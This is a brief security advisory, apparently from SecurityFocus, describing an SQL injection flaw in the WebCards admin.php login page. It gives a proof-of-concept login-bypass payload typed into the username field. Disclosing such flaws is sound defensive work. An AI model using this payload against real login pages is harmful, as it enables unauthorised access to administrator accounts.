WebCards 'admin.php' Login Page SQL Injection Vulnerability

An attacker can use a browser to exploit this issue.

The following proof of concept is available:

http://www.example.com/webcards/admin.php

Enter the following in the 'username' textbox: admin" and ""="
Enter the following in the 'password' textbox: 1


 

Privacy Statement
Copyright 2010, SecurityFocus